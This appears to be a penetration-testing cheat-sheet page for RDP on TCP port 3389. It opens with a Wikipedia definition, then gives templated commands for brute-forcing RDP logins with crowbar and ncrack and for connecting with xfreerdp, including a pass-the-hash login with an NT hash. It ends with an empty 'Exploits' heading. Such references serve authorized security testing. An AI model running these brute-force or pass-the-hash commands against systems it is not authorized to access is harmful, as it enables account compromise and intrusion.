TCP 3389: RDP
Remote Desktop Protocol is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software.
-- Wikipedia
Brute force credentials
crowbar
crowbar -b -rdp -s <ip>/32 -u <user> -C <password-file> -n 1
Ncrack
ncrack -vv --user <user> -P <password-file> rdp://<ip>
Connect (authenticated)
Local user
xfreerdp /u:<user> /v:<ip> +clipboard
Domain user
xfreerdp /d:<domain> /u:<user> /v:<ip> +clipboard
Domain user (PtH)
xfreerdp /d:<domain> /u:<user> /pth:<nt-hash> /v:<ip> +clipboard
Exploits
Last updated